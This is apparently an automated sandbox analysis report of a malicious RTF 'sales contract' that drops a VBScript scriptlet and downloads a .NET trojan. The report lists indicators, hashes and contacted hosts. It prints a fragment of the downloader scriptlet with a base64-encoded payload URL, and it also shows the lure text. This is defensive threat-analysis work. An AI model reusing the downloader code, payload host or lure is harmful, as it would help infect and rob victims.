Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	Logon Script (Windows)	Logon Script (Windows)	3 Scripting	Security Account Manager	31 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	33 Exploitation for Client Execution	Logon Script (Mac)	Logon Script (Mac)	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	22 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Command and Scripting Interpreter	Network Logon Script	Network Logon Script	13 Software Packing	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 Scheduled Task/Job	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	3 PowerShell	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Revised sales contract for Crosswear.rtf	32%	ReversingLabs	Script-WScript.Exploit.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe	100%	Avira	HEUR/AGEN.1250356
C:\Users\user\AppData\Roaming\mum.exe	100%	Avira	HEUR/AGEN.1250356
C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	100%	Avira	HEUR/AGEN.1250356
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\mum.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe	81%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
15.0.mum.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen		Download File
8.0.mum.exe.11b0000.0.unpack	100%	Avira	HEUR/AGEN.1250356		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://checkip.dyndns.orgP	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
f0705964.xsph.ru	141.8.192.151	true	false	high
checkip.dyndns.com	132.226.8.169	true	true	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://f0705964.xsph.ru/mum.exe	false		high
http://checkip.dyndns.org/	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
httP://f0705964.xsph.ru/mum.exe	powershell.exe, 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgP	mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000004.00000002.914821376.000000000018E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.937210207.000000000027E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	mum.exe, 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	mum.exe, 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleaner	powershell.exe, 00000004.00000002.914821376.000000000018E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.937210207.000000000027E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	mum.exe, 0000000F.00000002.1283209898.00000000026E8000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1283632776.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1283300680.00000000026E6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	mum.exe, 0000000F.00000002.1283209898.00000000026E8000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1283632776.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1283300680.00000000026E6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
httP://f0705964.xsph.ru	powershell.exe, 00000012.00000002.993914279.00000000035AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	mum.exe, 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000013.00000002.995998092.0000000002941000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000013.00000002.993872041.00000000026F5000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001D.00000002.1050938955.00000000026F5000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001D.00000002.1052652810.000000000295C000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false		high
httP://f0705964.xsph.ru/mum.exePE	powershell.exe, 00000009.00000002.947506272.000000000387A000.00000004.00000800.00020000.00000000.sdmp	false		high
httP://f0705964.xsph.ru/mum.exePEQ	powershell.exe, 00000004.00000002.919275004.000000000364A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.993914279.00000000035AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://f0705964.xsph.ru	powershell.exe, 00000004.00000002.919533921.0000000003745000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	true
193.122.130.0	unknown	United States	31898	ORACLE-BMC-31898US	true
141.8.192.151	f0705964.xsph.ru	Russian Federation	35278	SPRINTHOSTRU	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	688701
Start date and time:	2022-08-23 13:41:53 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Revised sales contract for Crosswear.rtf
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winRTF@44/31@8/3
EGA Information:	Successful, ratio: 85.7%
HDC Information:	Failed
HCA Information:	Successful, ratio: 91% Number of executed functions: 444 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .rtf Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
Execution Graph export aborted for target powershell.exe, PID 2016 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Revised sales contract for Crosswear.rtf

Simulations

Behavior and APIs

Time	Type	Description
13:42:21	API Interceptor	101x Sleep call for process: powershell.exe modified
13:42:32	API Interceptor	1529x Sleep call for process: mum.exe modified
13:42:39	API Interceptor	3x Sleep call for process: schtasks.exe modified
13:45:01	API Interceptor	94x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
132.226.8.169	RFQ ORDER 00226.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	purchase order.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	WvrXWRS5MZAOWYe.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	vDZsO7QUv3.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	hesap bildirimi.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	listed items.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Variant.Lazy.234727.32325.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	xXICOBtKY6NHZec.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Attachement Specifications.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	400000.854F1E97-5DBB-4A87-A566-33D9012B05E2 pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	OPTICAL-EYEWEAR 094216.xlsx	Get hash	malicious	Browse	checkip.dyndns.org/
	QmWbXqbgVW.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	EkQDX.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	9518-Fairhaven-Dr.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	transfer sheet.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	#4rgc001.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Order List.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	BFp9t4j5l5.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	PO_20220815.exe	Get hash	malicious	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
checkip.dyndns.com	2QeMjAv3iT.exe	Get hash	malicious	Browse	158.101.44.242
	onnxMdZI73.exe	Get hash	malicious	Browse	132.226.247.73
	MV GOLDEN SCHULTE.exe	Get hash	malicious	Browse	132.226.247.73
	Attachment Details.exe	Get hash	malicious	Browse	132.226.247.73
	RFQ ORDER 00226.exe	Get hash	malicious	Browse	132.226.8.169
	ITEM LIST AND SPECIFICATION.exe	Get hash	malicious	Browse	158.101.44.242
	purchase order.exe	Get hash	malicious	Browse	132.226.8.169
	Our Purchase Order.exe	Get hash	malicious	Browse	158.101.44.242
	ITEM LIST_5050_Pacific.exe	Get hash	malicious	Browse	193.122.130.0
	Proof of payment.exe	Get hash	malicious	Browse	132.226.247.73
	WvrXWRS5MZAOWYe.exe	Get hash	malicious	Browse	132.226.8.169
	Q37UK9cUEN2GFV3.exe	Get hash	malicious	Browse	132.226.247.73
	RevisedQuotationlist.exe	Get hash	malicious	Browse	132.226.247.73
	RFQ ORDER 00226.exe	Get hash	malicious	Browse	158.101.44.242
	P75lXtQzg8.exe	Get hash	malicious	Browse	158.101.44.242
	vDZsO7QUv3.exe	Get hash	malicious	Browse	132.226.8.169
	DHL DOC 74653898.pdf.exe	Get hash	malicious	Browse	132.226.247.73
	SecuriteInfo.com.W32.AIDetectNet.01.8456.exe	Get hash	malicious	Browse	132.226.247.73
	Inv. PAYMENT Details.xlsx	Get hash	malicious	Browse	132.226.247.73
	Inv. PAYMENT Details.js	Get hash	malicious	Browse	132.226.247.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UTMEMUS	onnxMdZI73.exe	Get hash	malicious	Browse	132.226.247.73
	MV GOLDEN SCHULTE.exe	Get hash	malicious	Browse	132.226.247.73
	Attachment Details.exe	Get hash	malicious	Browse	132.226.247.73
	RFQ ORDER 00226.exe	Get hash	malicious	Browse	132.226.8.169
	purchase order.exe	Get hash	malicious	Browse	132.226.8.169
	Proof of payment.exe	Get hash	malicious	Browse	132.226.247.73
	WvrXWRS5MZAOWYe.exe	Get hash	malicious	Browse	132.226.8.169
	Q37UK9cUEN2GFV3.exe	Get hash	malicious	Browse	132.226.247.73
	RevisedQuotationlist.exe	Get hash	malicious	Browse	132.226.247.73
	vDZsO7QUv3.exe	Get hash	malicious	Browse	132.226.8.169
	DHL DOC 74653898.pdf.exe	Get hash	malicious	Browse	132.226.247.73
	SecuriteInfo.com.W32.AIDetectNet.01.8456.exe	Get hash	malicious	Browse	132.226.247.73
	Inv. PAYMENT Details.xlsx	Get hash	malicious	Browse	132.226.247.73
	Inv. PAYMENT Details.js	Get hash	malicious	Browse	132.226.247.73
	Item.exe	Get hash	malicious	Browse	132.226.247.73
	hesap bildirimi.exe	Get hash	malicious	Browse	132.226.8.169
	#U00dc#U00c7#U00dcNC#U00dc TARAF DETAYLARI.exe	Get hash	malicious	Browse	132.226.247.73
	eudst1CZ8ygUYa7.exe	Get hash	malicious	Browse	132.226.247.73
	cdagu21bYo.exe	Get hash	malicious	Browse	132.226.247.73
	listed items.exe	Get hash	malicious	Browse	132.226.8.169
ORACLE-BMC-31898US	2QeMjAv3iT.exe	Get hash	malicious	Browse	158.101.44.242
	ITEM LIST AND SPECIFICATION.exe	Get hash	malicious	Browse	158.101.44.242
	Our Purchase Order.exe	Get hash	malicious	Browse	158.101.44.242
	ITEM LIST_5050_Pacific.exe	Get hash	malicious	Browse	193.122.130.0
	RFQ ORDER 00226.exe	Get hash	malicious	Browse	158.101.44.242
	P75lXtQzg8.exe	Get hash	malicious	Browse	158.101.44.242
	RFQ REF R2100131410.pdf.exe	Get hash	malicious	Browse	193.122.130.0
	PNsbHs7xzL.exe	Get hash	malicious	Browse	193.122.130.0
	http://results@remax.com.au.yuyasociados.com/results@remax.com.au	Get hash	malicious	Browse	134.70.132.2
	heather.albert#Ticket513473.htm	Get hash	malicious	Browse	134.70.28.1
	heather.albert#Ticket513473.htm	Get hash	malicious	Browse	134.70.28.1
	oZhdK4h48NNOKFW.exe	Get hash	malicious	Browse	193.122.130.0
	waEROKawNm.exe	Get hash	malicious	Browse	193.122.130.0
	fattura proforma.exe	Get hash	malicious	Browse	158.101.44.242
	po063#.exe	Get hash	malicious	Browse	193.122.6.168
	01-PO6QH.exe	Get hash	malicious	Browse	158.101.44.242
	Purchase Order.exe	Get hash	malicious	Browse	158.101.44.242
	NEW ORDER.exe	Get hash	malicious	Browse	193.122.6.168
	listed items.exe	Get hash	malicious	Browse	193.122.6.168
	ORDER-22808.js	Get hash	malicious	Browse	158.101.44.242

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	829952
Entropy (8bit):	7.980422003620349
Encrypted:	false
SSDEEP:	12288:Pu1znYPEX0k/g7Iw5O4OAA+sg7l+kwLnKsqH+OMcKDZrqlmakPDbYsu/tn1:GZY7ft/3HEKRHEZ6AbYNt
MD5:	06C16E9A1807F8754D73C6B77E978D02
SHA1:	A3B04691195895358512BCAE3658E2D10CDB2178
SHA-256:	1A87E22338388A438C836B8CF97E2C28074D3CC992879D330F68CA88B684F571
SHA-512:	4DA172D828B8AB4791E90D21FA422A12CBB09678780132822A6DD7D8107DE28615E3F1D2D575DC0A7243EC1E8E65E848C953ADD6B6867B045E20FAE3BB6801D9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
IE Cache URL:	http://f0705964.xsph.ru/mum.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c................................. ........@.. ....................... ............@.....................................W.......\............................................................................ ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H...........9......S....`...&..........................................z.(......}.....(....o....}......0...........{............3.....(.......................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.\|.{....Xa}......}.....{....ok...:q....(....+..(........}.........(......................n..}.....{....,..{....oT.....{....*.s..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80127298.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
Category:	dropped
Size (bytes):	3712
Entropy (8bit):	5.036280919911438
Encrypted:	false
SSDEEP:	48:PJk/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fQ:Bk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DI
MD5:	1AB0C7CF263334FE407B9A145F04AF17
SHA1:	A261E12D4FE34A19ECE18C761FBA882559B6F663
SHA-256:	B1B631666516A6C8B15B5B0722BBA0492890A51B83565FC2A7326788F2DDBB39
SHA-512:	CB98FACDBC943ED84D6F9EEFE62516EB6D506940D52E7A4659F367B273324B8C3622DEF90437A7F80024C74A5DF7500E81D190FBB4177335B141AAC7A63DB53B
Malicious:	false
Preview:	......@.....!.....................5...........................Segoe UI....C.......@...............-...........................A..... . ..... . ...9.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...9.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FBB61633.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	370 sysV pure executable
Category:	dropped
Size (bytes):	262160
Entropy (8bit):	0.0018462035600765212
Encrypted:	false
SSDEEP:	3:mfBtjPHXdLlltFUlNlelt1tllP5:mZ8K
MD5:	C71A9A49CE66F4848EAD88FBBF56C45E
SHA1:	190C996710554261A515DD62D3CCB09CEDB0D28C
SHA-256:	C7F861746E0C1DB5B6BAD2F3E8DDD966FC02F088FD78F4B4AFEC726090540003
SHA-512:	E26925D15039DD3121035E48CC0990F3F67F62F7DE398D26E78872CBB2744FBACBCBCD72E44DBAB52274F7F85B618B210399627D30F2BCA470DC14DCC582DACF
Malicious:	false
Preview:	X.4.....`.Q.................................................j*....4.......4.....`.A.....`.A.......T.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	5.702760097512595
Encrypted:	false
SSDEEP:	1536:iyzakaBa9aRaOa2ncbZxCfTyzakaBa9aRaOa2ncbZxe67:iyzakaBa9aRaOa2cNxiyzakaBa9aRaO8
MD5:	AEC4110BC3BCB59AE8E80C28E750DEE9
SHA1:	0BEF7DA2EB4C02F425DC02DF6AB959FE12BD8788
SHA-256:	109F30FE0C72DBCE3ED5FABF7518FBA7CC5D5F41992186402938BDC5E60B5F38
SHA-512:	E95EC4B0F503688906619C41AEC57BA8259E692A29084E9562F1AB632F6860A752381CE003C321AE4AB7E0949C7106D677D5506F4889CCD4798563606AA67BB9
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................k.......-........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,......./...0...5...1...2...3...4...8...6...7...9...b...j...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......c...d...e...f...g...h...i...l...........m...n...................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{259EE6F9-0934-45E6-98B2-0071567418FD}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3586208805849456
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbE:IiiiiiiiiifdLloZQc8++lsJe1MzD/
MD5:	1AA8247082CBEFF605CCB2B48FBA2746
SHA1:	091F719BDEBB7A84AC3EFBEAF5FA6620FE1C417A
SHA-256:	05FB9A4FBAE2F432CA91667BB96BD481345AE0F6781C580D81F6789C12E58586
SHA-512:	5FD5374A8D7BF578AAFF05D289756748FACBD4C660064B921D40C2F1AEB97560BC29D7774B67254B6BD95417620AB4FD6AEEE548B210C6B83161778ED3B2DC14
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5C8D69A0-CC71-4B83-AF64-7D30251F3853}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{97484890-462A-40AF-968F-F7AFE2F9A970}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	44618
Entropy (8bit):	2.9166030885019487
Encrypted:	false
SSDEEP:	768:sm/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:DFia0Dqeb0nstw29rVzWSgm58F
MD5:	D2F63DD136743678D3DB23C29BCD88FA
SHA1:	2E46233C5CD9DAD02F392DC3BE42A2D618317E8F
SHA-256:	581E57766F7FE8EF2AEFD9CEFEC179DE9DFC8EB205DE242AF97D974E470916AC
SHA-512:	23FEA2C354DB8C4F3785740A0613C2887001C56695A5C8497EDBC36177B32C23C08F75A4F6D0BDB6D491AF82D3DF838F92891AE307E597D89F7C4EC60F30047E
Malicious:	false
Preview:	c.0.5.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .d.o.e.s. .n.o.t. .w.o.r.k. .i.n. .e.m.a.i.l. .P.r.e.v.i.e.w.....P.l.e.a.s.e. .d.o.w.n.l.o.a.d. .t.h.e. .d.o.c.u.m.e.n.t. .a.n.d. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .w.h.e.n. .o.p.e.n.i.n.g.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.D.R.d.t.f.h.g.Y.g.e.g.h.D.p.....s.c.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".....................................4...>...D.................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.W.f...CJ..OJ..QJ..U..^J..aJ.....h.CK.5..CJ..OJ..QJ..^J..aJ....h.CK.CJ..OJ..QJ..^J..aJ.

C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	19921
Entropy (8bit):	5.7859702560472295
Encrypted:	false
SSDEEP:	384:GvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvi2Rz6vZVUpC8Q4zF:GvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOV
MD5:	E9B62F3D61D226EFE8D4A3FCF1C15D30
SHA1:	B68B646683148D27F69BC812B270F75F2E7581D3
SHA-256:	51807145B38F6170871EC88FB3360FEAB4DB900E83FD7EE8235AF2EB5ED1BF17
SHA-512:	D7A9D04536B9A89F53330B3571057234A8C62C1857583D7D51431643FA8CD9D12445A99DBD9C48039F4B5F046441F2532F04FD44B1E1BDA40B1B8C720BFE0887
Malicious:	true
Preview:	..<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2YwNzA1OTY0LnhzcGgucnUvbXVtLmV4ZQ==" 'clsyc2..yulkytjtrhtjrkdsarjky ="bXVtLmV4ZQ==" 'clsyc2..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv......

C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWY3n:qY3n
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Preview:	[ZoneTransfer]..ZoneId=3..

C:\Users\user\AppData\Local\Temp\tmp430A.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\mum.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.115280404917023
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtMa+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTM/v
MD5:	F68FD447E925A59C5FEDAD28639C03B5
